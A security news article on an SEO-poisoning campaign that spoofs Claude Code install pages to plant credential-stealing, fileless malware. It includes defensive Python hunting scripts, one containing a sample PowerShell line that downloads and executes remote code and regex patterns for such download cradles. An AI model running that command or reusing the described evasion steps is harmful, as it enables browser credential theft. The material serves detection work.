Fake Claude Code Installers Deliver Credential-Stealing Malware
Security researchers report a coordinated SEO-poisoning campaign that places spoofed Claude Code install pages at the top of search results, then delivers fileless infostealer malware via malicious install commands. Cyderes' Howler Cell and Ontinue both describe attackers using sponsored links and spoofed install pages that run MSHTA- or PowerShell-based loaders, with Cyderes reporting a reflective .NET infostealer beaconing to 185.177.239.255 and Ontinue describing a PowerShell downloader hosted on a domain such as events.msft23.com. Malwarebytes and other vendors link the chain in some samples to a backdoor called DinDoor and a Deno-based remote access Trojan. Cyderes emphasises that Anthropic itself is not compromised and that the campaign impersonates the Claude Code brand to trick developers and new users.
What happened
Security teams have identified an active SEO-poisoning and malvertising campaign that targets people searching for installation guidance for Claude Code. Cyderes' Howler Cell published a technical writeup describing a spoofed install page shown as a sponsored search result that displays a malicious install command; Cyderes reports the delivery chain ends in a reflective .NET infostealer beaconing to 185.177.239.255. Ontinue's Cyber Defence Centre reported parallel findings where a sponsored result points to a domain like events.msft23.com, and a displayed command causes Invoke-RestMethod to fetch a heavily obfuscated PowerShell loader. Malwarebytes and other vendors linked some samples to a backdoor labelled DinDoor that subsequently stages a Deno-based remote access Trojan.
Technical details
Cyderes' analysis describes a multi-stage, largely fileless chain designed to evade traditional static IOC matching, with an MP3/HTA polyglot used to pass file-type inspection while executing as an HTA when processed by mshta.exe. Ontinue's report states the PowerShell loader performs environment checks, aborting for certain regional settings, then searches Chromium-family browsers for v20 app_bound_encrypted_key and v10 encrypted_key items. Hackread's coverage of Ontinue notes the campaign includes a native helper payload_x64.bin (compiled 24 March 2026 in observed samples) that is injected into a browser process and uses the IElevator2 COM interface to obtain decrypted browser data.
Observed delivery mechanisms and evasion
Cyderes and Ontinue both document that attackers place spoofed pages in paid search results to reach users at the point they expect official install instructions. Cyderes details a per-victim subdomain naming scheme derived from MD5(COMPUTERNAME+USERNAME), so each infected host contacts a hostname unique to it and a blocklist of previously observed URLs will not match the next victim's traffic. Several writeups highlight fileless post-execution behavior intended to defeat AMSI, EDR telemetry, sandbox analysis, and static detection methods.
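Because the subdomain is a function of values a defender already knows for its own fleet, the scheme can be turned around: compute the label each managed host would produce and hunt for it in DNS logs instead of waiting for a vendor blocklist. The script below is an added example written for this article, not code from Cyderes, Ontinue, or any of the reports cited here. The host inventory, DNS log lines, and the example.invalid parent domain are constructed; the page gives the scheme only as MD5(COMPUTERNAME+USERNAME), so plain concatenation with no delimiter, UTF-8 encoding, and the generated case variants are assumptions.

```python
import hashlib

# Constructed inventory of managed hosts as (COMPUTERNAME, USERNAME) pairs; not real data.
HOST_INVENTORY = [
    ("DEV-WS-017", "alice"),
    ("BUILD-RUNNER-02", "svc_ci"),
]


def victim_label(computername, username):
    """MD5 hex digest of COMPUTERNAME+USERNAME.

    The writeup gives the scheme as MD5(COMPUTERNAME+USERNAME); plain concatenation
    with no delimiter, case preserved, UTF-8 encoding is an assumption made here.
    """
    return hashlib.md5((computername + username).encode("utf-8")).hexdigest()


def expected_labels(inventory):
    """Map every candidate label back to the host it would identify.

    Case handling of the two environment variables is not stated in the report, so
    the as-typed, upper-case and lower-case variants are all generated (assumption).
    """
    labels = {}
    for computername, username in inventory:
        for cn, un in ((computername, username),
                       (computername.upper(), username.upper()),
                       (computername.lower(), username.lower())):
            labels[victim_label(cn, un)] = (computername, username)
    return labels


def hunt_dns_log(lines, labels):
    """Return (qname, host) for each query whose leftmost label is a per-victim hash."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # skip malformed lines rather than crash the hunt
        qname = parts[-1].rstrip(".").lower()
        leftmost = qname.split(".")[0]
        if len(leftmost) == 32 and leftmost in labels:
            hits.append((qname, labels[leftmost]))
    return hits


# Constructed resolver log: "<timestamp> <client_ip> <qname>". The first entry embeds the
# label computed for DEV-WS-017\alice so the hunt has something to find; the third is
# MD5("") and must not match any inventory host.
SAMPLE_DNS_LOG = [
    f"2026-04-02T09:14:03Z 10.20.4.17 {victim_label('DEV-WS-017', 'alice')}.example.invalid.",
    "2026-04-02T09:14:05Z 10.20.4.17 claude.ai.",
    "2026-04-02T09:14:09Z 10.20.4.31 d41d8cd98f00b204e9800998ecf8427e.example.invalid.",
    "2026-04-02T09:15:00Z 10.20.4.31 nuget.org.",
]

if __name__ == "__main__":
    for qname, host in hunt_dns_log(SAMPLE_DNS_LOG, expected_labels(HOST_INVENTORY)):
        print(f"per-victim beacon label for {host}: {qname}")
```

The match is keyed on the leftmost label only, so it works regardless of which parent domain the attacker rotates to; if a vendor later publishes the exact concatenation format, only victim_label needs to change.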
Attribution and compromise scope
Cyderes explicitly states that Anthropic and the legitimate Claude Code install path are not compromised; the campaign impersonates the brand. Multiple independent vendors and researchers have observed similar spoofing and payload patterns across spoofed pages for other developer tools, including trojanized releases on GitHub and SourceForge reported in industry tracking.
Industry context
Editorial analysis: Companies and open-source ecosystems that grow rapid, developer-facing tool adoption become attractive templates for SEO-poisoning and malvertising. Observers of comparable campaigns note that attackers routinely substitute legitimate command strings with malicious hosts and small code changes, then rely on paid search placements to surface to novices and developers following install guides.
Impact for practitioners
Editorial analysis: For security teams, the campaign underscores two recurring operational risks, first the trust placed in search-ad results and, second, the limitations of static IOCs when attackers use per-host derivation and fileless runtime techniques. Teams responsible for developer workstation security and CI runners should treat developer-facing web flows as an exploitable attack surface and assume that install commands copied from search results require verification.
What to watch
Editorial analysis: Monitor vendor advisories from Cyderes, Ontinue, Malwarebytes, and Trend Micro for updated IOCs and behavioral indicators. Watch for expanded use of polyglot payloads, additional spoofed domains, and similar campaigns targeting other AI development tools; security researchers have already flagged related spoofing across JetBrains, NotebookLM, and other developer pages. Finally, look for community signals such as GitHub issue reports or package-repository abuse notices that indicate trojanized releases tied to the campaign.
Practical detection and mitigation notes
Editorial analysis: Endpoint and web-proxy telemetry that captures script execution context is the highest-value detection point: mshta.exe process creation, especially with a remote URL or a non-.hta argument such as the MP3/HTA polyglot, PowerShell command lines that pipe Invoke-RestMethod output into Invoke-Expression, and reflective .NET assembly loading. Observers recommend validating install commands against official vendor documentation and allowlisting install sources in managed environments. Security teams should also prioritize detection of credential access against the browser storage formats described in the reports, and correlate suspicious paid-search click paths with downstream endpoint telemetry.
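The following is an added example, not a detection published by any of the vendors named above, showing how the three command-line patterns called out in this section can be checked against process-creation telemetry. The events are constructed in a Sysmon Event ID 1 style (parent image, image, command line); the hostnames, paths and rule names are assumptions. It is a string-level triage filter for hunting, not a substitute for AMSI or ETW visibility into what the fileless stages do after launch.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://cdn.example.invalid/track.mp3"},
    {"id": 2,
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "irm https://events.example.invalid/get | iex"'},
    {"id": 3,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\alice\src"},
    {"id": 4,
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -Command "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"'},
]

# Download primitives and their common aliases.
DOWNLOAD_RE = re.compile(
    r"Invoke-RestMethod|\birm\b|Invoke-WebRequest|\biwr\b|DownloadString|DownloadData|DownloadFile",
    re.I)
# Execution of the fetched content, or an encoded command that hides it.
EXEC_RE = re.compile(r"\biex\b|Invoke-Expression|-EncodedCommand|\s-e(?:nc)?\s", re.I)
# In-memory .NET assembly loading from the command line.
REFLECT_RE = re.compile(r"Reflection\.Assembly\]::Load|Assembly\.Load\(", re.I)


def basename(path):
    """Last path component, lower-cased; tolerates either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names that match one process-creation event."""
    image = basename(event["image"])
    cmd = event["cmdline"]
    rules = []
    if image == "mshta.exe":
        # Legitimate use passes a local .hta file; a URL or a media-looking extension
        # (the MP3/HTA polyglot case) is the interesting signal.
        args = cmd.split(None, 1)[1] if " " in cmd else ""
        if "http" in args.lower() or not args.lower().endswith(".hta"):
            rules.append("mshta_remote_or_non_hta_argument")
    if image in ("powershell.exe", "pwsh.exe"):
        if DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):
            rules.append("powershell_download_cradle")
        if REFLECT_RE.search(cmd):
            rules.append("powershell_reflective_assembly_load")
    return rules


def scan(events):
    """Map event id -> matched rules, omitting events that matched nothing."""
    findings = {}
    for event in events:
        rules = classify(event)
        if rules:
            findings[event["id"]] = rules
    return findings


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Event 3 is an ordinary PowerShell invocation and must stay quiet; the cradle rule deliberately requires both a download primitive and an execution primitive so that plain Invoke-WebRequest downloads in build scripts do not page anyone.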
Scoring Rationale
This is a notable, practitioner-relevant campaign because it targets developer workflows and uses fileless techniques and per-victim artifacts that reduce static IOC effectiveness. The story matters to endpoint, SRE, and security engineering teams but does not represent a novel, industry-defining capability.
